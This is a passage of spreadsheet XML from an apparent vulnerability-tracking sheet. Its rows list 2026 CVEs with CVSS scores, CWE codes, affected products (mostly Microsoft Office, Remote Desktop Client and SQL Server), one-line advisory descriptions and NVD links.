t="inlineStr"><is><t>NVD</t></is></c><c r="O224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P224" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q224" s="5" t="inlineStr" /><c r="R224" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S224" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t></is></c></row><row r="225"><c r="A225" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C225" s="5" t="inlineStr"><is><t>CVE-2026-78462</t></is></c><c r="D225" s="5" t="n"><v>8.800000000000001</v></c><c r="E225" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F225" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G225" s="5" t="inlineStr" /><c r="H225" s="5" t="n"><v>0.005</v></c><c r="I225" s="5" t="inlineStr" /><c r="J225" s="5" t="inlineStr" /><c r="K225" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L225" s="5" t="inlineStr" /><c r="M225" s="5" t="inlineStr" /><c r="N225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P225" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q225" s="5" t="inlineStr" /><c r="R225" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S225" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t></is></c></row><row r="226"><c r="A226" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C226" s="5" t="inlineStr"><is><t>CVE-2026-78463</t></is></c><c r="D226" s="5" t="n"><v>8.800000000000001</v></c><c r="E226" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G226" s="5" t="inlineStr" /><c r="H226" s="5" t="n"><v>0.008999999999999999</v></c><c r="I226" s="5" t="inlineStr" /><c r="J226" s="5" t="inlineStr" /><c r="K226" s="5" t="inlineStr" /><c r="L226" s="5" t="inlineStr" /><c r="M226" s="5" t="inlineStr" /><c r="N226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P226" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q226" s="5" t="inlineStr" /><c r="R226" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S226" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t></is></c></row><row r="227"><c r="A227" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C227" s="5" t="inlineStr"><is><t>CVE-2026-78504</t></is></c><c r="D227" s="5" t="n"><v>8.800000000000001</v></c><c r="E227" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G227" s="5" t="inlineStr" /><c r="H227" s="5" t="n"><v>0.006</v></c><c r="I227" s="5" t="inlineStr" /><c r="J227" s="5" t="inlineStr" /><c r="K227" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L227" s="5" t="inlineStr" /><c r="M227" s="5" t="inlineStr" /><c r="N227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P227" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q227" s="5" t="inlineStr" /><c r="R227" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S227" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t></is></c></row><row r="228"><c r="A228" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C228" s="5" t="inlineStr"><is><t>CVE-2026-78505</t></is></c><c r="D228" s="5" t="n"><v>8.800000000000001</v></c><c r="E228" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F228" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G228" s="5" t="inlineStr" /><c r="H228" s="5" t="n"><v>0.008</v></c><c r="I228" s="5" t="inlineStr" /><c r="J228" s="5" t="inlineStr" /><c r="K228" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L228" s="5" t="inlineStr" /><c r="M228" s="5" t="inlineStr" /><c r="N228" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O228" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P228" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q228" s="5" t="inlineStr" /><c r="R228" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S228" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T228" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t></is></c></row><row r="229"><c r="A229" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B229" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C229" s="5" t="inlineStr"><is><t>CVE-2026-78507</t></is></c><c r="D229" s="5" t="n"><v>8.800000000000001</v></c><c r="E229" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F229" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G229" s="5" t="inlineStr" /><c r="H229" s="5" t="n"><v>0.006</v></c><c r="I229" s="5" t="inlineStr" /><c r="J229" s="5" t="inlineStr" /><c r="K229" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L229" s="5" t="inlineStr" /><c r="M229" s="5" t="inlineStr" /><c r="N229" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O229" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P229" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q229" s="5" t="inlineStr" /><c r="R229" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S229" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T229" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t></is></c></row><row r="230"><c r="A230" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B230" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C230" s="5" t="inlineStr"><is><t>CVE-2026-78511</t></is></c><c r="D230" s="5" t="n"><v>8.800000000000001</v></c><c r="E230" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F230" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G230" s="5" t="inlineStr" /><c r="H230" s="5" t="n"><v>0.008</v></c><c r="I230" s="5" t="inlineStr" /><c r="J230" s="5" t="inlineStr" /><c r="K230" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L230" s="5" t="inlineStr" /><c r="M230" s="5" t="inlineStr" /><c r="N230" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O230" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P230" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q230" s="5" t="inlineStr" /><c r="R230" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S230" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T230" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t></is></c></row><row r="231"><c r="A231" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B231" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C231" s="5" t="inlineStr"><is><t>CVE-2026-78512</t></is></c><c r="D231" s="5" t="n"><v>8.800000000000001</v></c><c r="E231" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F231" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G231" s="5" t="inlineStr" /><c r="H231" s="5" t="n"><v>0.008</v></c><c r="I231" s="5" t="inlineStr" /><c r="J231" s="5" t="inlineStr" /><c r="K231" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L231" s="5" t="inlineStr" /><c r="M231" s="5" t="inlineStr" /><c r="N231" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O231" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P231" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q231" s="5" t="inlineStr" /><c r="R231" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="S231" s="5" t="inlineStr"><is><t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T231" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t></is></c></row><row r="232"><c r="A232" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B232" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C232" s="5" t="inlineStr"><is><t>CVE-2026-78514</t></is></c><c r="D232" s="5" t="n"><v>8.800000000000001</v></c><c r="E232" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F232" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G232" s="5" t="inlineStr" /><c r="H232" s="5" t="n"><v>0.006</v></c><c r="I232" s="5" t="inlineStr" /><c r="J232" s="5" t="inlineStr" /><c r="K232" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L232" s="5" t="inlineStr" /><c r="M232" s="5" t="inlineStr" /><c r="N232" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O232" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P232" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q232" s="5" t="inlineStr" /><c r="R232" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S232" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T232" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t></is></c></row><row r="233"><c r="A233" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B233" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C233" s="5" t="inlineStr"><is><t>CVE-2026-78517</t></is></c><c r="D233" s="5" t="n"><v>8.800000000000001</v></c><c r="E233" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F233" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G233" s="5" t="inlineStr" /><c r="H233" s="5" t="n"><v>0.006</v></c><c r="I233" s="5" t="inlineStr" /><c r="J233" s="5" t="inlineStr" /><c r="K233" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L233" s="5" t="inlineStr" /><c r="M233" s="5" t="inlineStr" /><c r="N233" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O233" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P233" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q233" s="5" t="inlineStr" /><c r="R233" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S233" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T233" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t></is></c></row><row r="234"><c r="A234" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B234" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C234" s="5" t="inlineStr"><is><t>CVE-2026-78518</t></is></c><c r="D234" s="5" t="n"><v>8.800000000000001</v></c><c r="E234" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F234" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G234" s="5" t="inlineStr" /><c r="H234" s="5" t="n"><v>0.008999999999999999</v></c><c r="I234" s="5" t="inlineStr" /><c r="J234" s="5" t="inlineStr" /><c r="K234" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L234" s="5" t="inlineStr" /><c r="M234" s="5" t="inlineStr" /><c r="N234" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O234" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P234" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q234" s="5" t="inlineStr" /><c r="R234" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S234" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T234" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t></is></c></row><row r="235"><c r="A235" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B235" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C235" s="5" t="inlineStr"><is><t>CVE-2026-78519</t></is></c><c r="D235" s="5" t="n"><v>8.800000000000001</v></c><c r="E235" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F235" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G235" s="5" t="inlineStr" /><c r="H235" s="5" t="n"><v>0.006</v></c><c r="I235" s="5" t="inlineStr" /><c r="J235" s="5" t="inlineStr" /><c r="K235" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L235" s="5" t="inlineStr" /><c r="M235" s="5" t="inlineStr" /><c r="N235" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O235" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P235" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q235" s="5" t="inlineStr" /><c r="R235" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S235" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T235" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t></is></c></row><row r="236"><c r="A236" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B236" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C236" s="5" t="inlineStr"><is><t>CVE-2026-78521</t></is></c><c r="D236" s="5" t="n"><v>8.800000000000001</v></c><c r="E236" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F236" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G236" s="5" t="inlineStr" /><c r="H236" s="5" t="n"><v>0.006</v></c><c r="I236" s="5" t="inlineStr" /><c r="J236" s="5" t="inlineStr" /><c r="K236" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L236" s="5" t="inlineStr" /><c r="M236" s="5" t="inlineStr" /><c r="N236" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O236" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P236" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q236" s="5" t="inlineStr" /><c r="R236" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S236" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T236" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t></is></c></row><row r="237"><c r="A237" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B237" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C237" s="5" t="inlineStr"><is><t>CVE-2026-78524</t></is></c><c r="D237" s="5" t="n"><v>8.800000000000001</v></c><c r="E237" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F237" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G237" s="5" t="inlineStr" /><c r="H237" s="5" t="n"><v>0.008</v></c><c r="I237" s="5" t="inlineStr" /><c r="J237" s="5" t="inlineStr" /><c r="K237" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L237" s="5" t="inlineStr" /><c r="M237" s="5" t="inlineStr" /><c r="N237" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O237" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P237" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q237" s="5" t="inlineStr" /><c r="R237" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S237" s="5" t="inlineStr"><is><t>Out-of-bounds write in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T237" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78524</t></is></c></row><row r="238"><c r="A238" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B238" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C238" s="5" t="inlineStr"><is><t>CVE-2026-78525</t></is></c><c r="D238" s="5" t="n"><v>8.800000000000001</v></c><c r="E238" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F238" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G238" s="5" t="inlineStr" /><c r="H238" s="5" t="n"><v>0.008</v></c><c r="I238" s="5" t="inlineStr" /><c r="J238" s="5" t="inlineStr" /><c r="K238" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L238" s="5" t="inlineStr" /><c r="M238" s="5" t="inlineStr" /><c r="N238" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O238" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P238" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q238" s="5" t="inlineStr" /><c r="R238" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S238" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T238" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78525</t></is></c></row><row r="239"><c r="A239" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B239" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C239" s="5" t="inlineStr"><is><t>CVE-2026-78526</t></is></c><c r="D239" s="5" t="n"><v>8.800000000000001</v></c><c r="E239" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F239" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G239" s="5" t="inlineStr" /><c r="H239" s="5" t="n"><v>0.006</v></c><c r="I239" s="5" t="inlineStr" /><c r="J239" s="5" t="inlineStr" /><c r="K239" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L239" s="5" t="inlineStr" /><c r="M239" s="5" t="inlineStr" /><c r="N239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q239" s="5" t="inlineStr" /><c r="R239" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S239" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78526</t></is></c></row><row r="240"><c r="A240" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C240" s="5" t="inlineStr"><is><t>CVE-2026-78834</t></is></c><c r="D240" s="5" t="n"><v>8.800000000000001</v></c><c r="E240" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F240" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G240" s="5" t="inlineStr" /><c r="H240" s="5" t="n"><v>0.005</v></c><c r="I240" s="5" t="inlineStr" /><c r="J240" s="5" t="inlineStr" /><c r="K240" s="5" t="inlineStr" /><c r="L240" s="5" t="inlineStr" /><c r="M240" s="5" t="inlineStr" /><c r="N240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P240" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q240" s="5" t="inlineStr" /><c r="R240" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S240" s="5" t="inlineStr"><is><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is></c><c r="T240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78834</t></is></c></row><row r="241"><c r="A241" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C241" s="5" t="inlineStr"><is><t>CVE-2026-79376</t></is></c><c r="D241" s="5" t="n"><v>8.800000000000001</v></c><c r="E241" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F241" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G241" s="5" t="inlineStr" /><c r="H241" s="5" t="n"><v>0.002</v></c><c r="I241" s="5" t="inlineStr" /><c r="J241" s="5" t="inlineStr" /><c r="K241" s="5" t="inlineStr" /><c r="L241" s="5" t="inlineStr" /><c r="M241" s="5" t="inlineStr" /><c r="N241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P241" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q241" s="5" t="inlineStr" /><c r="R241" s="5" t="inlineStr"><is><t>CWE-1284, CWE-20</t></is></c><c r="S241" s="5" t="inlineStr"><is><t>An issue in the l2cap_handle_data() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79376</t></is></c></row><row r="242"><c r="A242" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C242" s="5" t="inlineStr"><is><t>CVE-2026-79602</t></is></c><c r="D242" s="5" t="n"><v>8.800000000000001</v></c><c r="E242" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F242" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G242" s="5" t="inlineStr" /><c r="H242" s="5" t="n"><v>0.001</v></c><c r="I242" s="5" t="inlineStr" /><c r="J242" s="5" t="inlineStr" /><c r="K242" s="5" t="inlineStr" /><c r="L242" s="5" t="inlineStr" /><c r="M242" s="5" t="inlineStr" /><c r="N242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P242" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q242" s="5" t="inlineStr" /><c r="R242" s="5" t="inlineStr"><is><t>CWE-119</t></is></c><c r="S242" s="5" t="inlineStr"><is><t>A guest with a PCI device assigned that has at least a BAR on the IO port
space can trigger a BUG() in Xen.</t></is></c><c r="T242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79602</t></is></c></row><row r="243"><c r="A243" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C243" s="5" t="inlineStr"><is><t>CVE-2026-80074</t></is></c><c r="D243" s="5" t="n"><v>8.800000000000001</v></c><c r="E243" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G243" s="5" t="inlineStr" /><c r="H243" s="5" t="n"><v>0.006</v></c><c r="I243" s="5" t="inlineStr" /><c r="J243" s="5" t="inlineStr" /><c r="K243" s="5" t="inlineStr" /><c r="L243" s="5" t="inlineStr" /><c r="M243" s="5" t="inlineStr" /><c r="N243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P243" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q243" s="5" t="inlineStr" /><c r="R243" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S243" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80074</t></is></c></row><row r="244"><c r="A244" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C244" s="5" t="inlineStr"><is><t>CVE-2026-80077</t></is></c><c r="D244" s="5" t="n"><v>8.800000000000001</v></c><c r="E244" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G244" s="5" t="inlineStr" /><c r="H244" s="5" t="n"><v>0.006</v></c><c r="I244" s="5" t="inlineStr" /><c r="J244" s="5" t="inlineStr" /><c r="K244" s="5" t="inlineStr" /><c r="L244" s="5" t="inlineStr" /><c r="M244" s="5" t="inlineStr" /><c r="N244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P244" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q244" s="5" t="inlineStr" /><c r="R244" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S244" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80077</t></is></c></row><row r="245"><c r="A245" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C245" s="5" t="inlineStr"><is><t>CVE-2026-80080</t></is></c><c r="D245" s="5" t="n"><v>8.800000000000001</v></c><c r="E245" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G245" s="5" t="inlineStr" /><c r="H245" s="5" t="n"><v>0.006</v></c><c r="I245" s="5" t="inlineStr" /><c r="J245" s="5" t="inlineStr" /><c r="K245" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L245" s="5" t="inlineStr" /><c r="M245" s="5" t="inlineStr" /><c r="N245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P245" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q245" s="5" t="inlineStr" /><c r="R245" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="S245" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80080</t></is></c></row><row 